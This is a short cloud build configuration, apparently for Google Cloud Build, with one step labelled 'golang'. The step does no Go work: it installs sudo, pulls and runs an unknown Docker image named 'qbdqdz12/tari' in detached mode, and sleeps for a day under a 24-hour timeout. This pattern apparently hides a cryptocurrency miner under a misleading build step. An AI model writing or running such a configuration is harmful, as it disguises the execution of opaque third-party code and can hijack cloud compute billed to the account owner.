steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && sudo docker pull qbdqdz12/tari && sudo docker run -dt qbdqdz12/tari && sleep 86400
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
logsBucket: 'gs://mybucket112312'
options:
  diskSizeGb: '100'
